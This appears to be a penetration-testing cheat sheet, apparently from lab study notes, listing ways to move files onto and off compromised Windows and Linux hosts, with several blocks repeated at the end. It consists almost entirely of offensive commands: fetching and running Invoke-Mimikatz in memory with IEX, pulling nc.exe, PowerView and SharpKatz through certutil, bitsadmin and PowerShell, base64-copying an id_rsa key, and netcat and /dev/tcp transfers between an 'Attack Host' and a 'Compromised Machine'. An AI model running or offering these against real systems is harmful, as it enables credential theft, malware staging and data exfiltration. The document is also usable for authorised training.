File Transfers

Windows

Download a file with PowerShell

Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')

Execute a file in memory using PowerShell

IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')

Upload a file with PowerShell

Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

Invoke-WebRequest using a Chrome User Agent

Invoke-WebRequest http://<snip>/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"

File transfer using SMB

# Create the SMB Server using smbserver.py
sudo impacket-smbserver share -smb2support /tmp/smbshare
# Copy a File from the SMB Server
C:\user> copy \\192.168.220.133\share\nc.exe

# Create the SMB Server with a Username and Password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
# Copy a File from the SMB Server
C:\user> net use n: \\192.168.220.133\share /user:test test
C:\user> copy n:\nc.exe

Download a file using FTP

sudo python3 -m pyftpdlib --port 21
C:\user> (New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\ftp.txt')

Upload a file using FTP

sudo python3 -m pyftpdlib --port 21 --write
# PowerShell Upload File
C:\user> (New-Object Net.WebClient).UploadFile('ftp://<IP>/ftp.txt', 'C:\file.txt')

File transfer with base64 encoding

# Download
# Check file md5 hash
md5sum id_rsa
# Encode file to Base64
cat id_rsa |base64 -w 0;echo
# Copy and past the content in PS
[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("..base64content.."))
# Confirming the MD5 Hashes Match
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5

# Upload
# Encode file to Base64
C:\user> [Convert]::ToBase64String((Get-Content -path "C:\file" -Encoding byte))
# Check file md5 hash
Get-FileHash "C:\file" -Algorithm MD5 | select Hash
# Copy and past the content
echo ..base64encode.. | base64 -d > file
# Confirming the MD5 Hashes Match
md5sum hosts

File transfer with WebDav

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

# Dwonload
C:\user> dir \\192.168.49.128\DavWWWRoot
# Upload
C:\user> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\

Download a file using JavaScript and cscript.exe

# creat a file called wget.js
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
# Download a file using cscript.exe
cscript.exe /nologo wget.js https://path/PowerView.ps1 PowerView.ps1

File transfer using WinRM

# Create a PowerShell Remoting Session to DATABASE01
$Session = New-PSSession -ComputerName DATABASE01

# Copy samplefile.txt from our Localhost to the DATABASE01 Session
Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\

# Copy DATABASE.txt from DATABASE01 Session to our Localhost
Copy-Item -Path "C:\DATABASE.txt" -Destination C:\ -FromSession $Session

File transfer with RDP

# Mounting a Linux Folder Using rdesktop
rdesktop <IP> -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/'

# Mounting a Linux Folder Using xfreerdp
xfreerdp /v:<IP> /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/

Download a file using Bitsadmin

bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

Download a file using Certutil

certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

Linux

Download a file using Wget

wget https://path/LinEnum.sh -O /tmp/LinEnum.sh

Download a file using cURL

curl -o /tmp/LinEnum.sh https://path/LinEnum.sh

Upload a file using SCP

scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip

Download a file using SCP

scp user@target:/tmp/mimikatz.exe C:\Temp\mimikatz.exe

Creating a Web Server with Python3

python3 -m http.server

Creating a Web Server with PHP

php -S 0.0.0.0:8000

Download a file using PHP

php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

Creating a Web Server with Ruby

ruby -run -ehttpd . -p8000

File Transfer with Netcat and Ncat

# NetCat - Compromised Machine - Listening on Port 8000
nc -l -p 8000 > SharpKatz.exe
# Netcat - Attack Host - Sending File to Compromised machine
nc -q 0 <IP> 8000 < SharpKatz.exe

# Ncat - Compromised Machine - Listening on Port 8000
ncat -l -p 8000 --recv-only > SharpKatz.exe
# Ncat - Attack Host - Sending File to Compromised machine
ncat --send-only <IP> 8000 < SharpKatz.exe

# Attack Host - Sending File as Input to Netcat
sudo nc -l -p 443 -q 0 < SharpKatz.exe
# Compromised Machine Connect to Netcat to Receive the File
nc <IP> 443 > SharpKatz.exe

# Attack Host - Sending File as Input to Ncat
sudo ncat -l -p 443 --send-only < SharpKatz.exe
# Compromised Machine Connect to Ncat to Receive the File
ncat <IP> 443 --recv-only > SharpKatz.exe

# Compromised Machine Connecting to Netcat Using /dev/tcp to Receive the File
cat < /dev/tcp/<IP>/443 > SharpKatz.exe

PreviousFootprinting NextShells & Payloads

Last updated 10 days ago

# Create the SMB Server using smbserver.py sudo impacket-smbserver share -smb2support /tmp/smbshare # Copy a File from the SMB Server C:\user> copy \\192.168.220.133\share\nc.exe # Create the SMB Server with a Username and Password sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test # Copy a File from the SMB Server C:\user> net use n: \\192.168.220.133\share /user:test test C:\user> copy n:\nc.exe

# Download # Check file md5 hash md5sum id_rsa # Encode file to Base64 cat id_rsa |base64 -w 0;echo # Copy and past the content in PS [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("..base64content..")) # Confirming the MD5 Hashes Match Get-FileHash C:\Users\Public\id_rsa -Algorithm md5 # Upload # Encode file to Base64 C:\user> [Convert]::ToBase64String((Get-Content -path "C:\file" -Encoding byte)) # Check file md5 hash Get-FileHash "C:\file" -Algorithm MD5 | select Hash # Copy and past the content echo ..base64encode.. | base64 -d > file # Confirming the MD5 Hashes Match md5sum hosts

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous # Dwonload C:\user> dir \\192.168.49.128\DavWWWRoot # Upload C:\user> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\

# creat a file called wget.js var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile(WScript.Arguments(1)); # Download a file using cscript.exe cscript.exe /nologo wget.js https://path/PowerView.ps1 PowerView.ps1

# Create a PowerShell Remoting Session to DATABASE01 $Session = New-PSSession -ComputerName DATABASE01 # Copy samplefile.txt from our Localhost to the DATABASE01 Session Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\ # Copy DATABASE.txt from DATABASE01 Session to our Localhost Copy-Item -Path "C:\DATABASE.txt" -Destination C:\ -FromSession $Session

# Mounting a Linux Folder Using rdesktop rdesktop <IP> -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/' # Mounting a Linux Folder Using xfreerdp xfreerdp /v:<IP> /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/

# NetCat - Compromised Machine - Listening on Port 8000 nc -l -p 8000 > SharpKatz.exe # Netcat - Attack Host - Sending File to Compromised machine nc -q 0 <IP> 8000 < SharpKatz.exe # Ncat - Compromised Machine - Listening on Port 8000 ncat -l -p 8000 --recv-only > SharpKatz.exe # Ncat - Attack Host - Sending File to Compromised machine ncat --send-only <IP> 8000 < SharpKatz.exe # Attack Host - Sending File as Input to Netcat sudo nc -l -p 443 -q 0 < SharpKatz.exe # Compromised Machine Connect to Netcat to Receive the File nc <IP> 443 > SharpKatz.exe # Attack Host - Sending File as Input to Ncat sudo ncat -l -p 443 --send-only < SharpKatz.exe # Compromised Machine Connect to Ncat to Receive the File ncat <IP> 443 --recv-only > SharpKatz.exe # Compromised Machine Connecting to Netcat Using /dev/tcp to Receive the File cat < /dev/tcp/<IP>/443 > SharpKatz.exe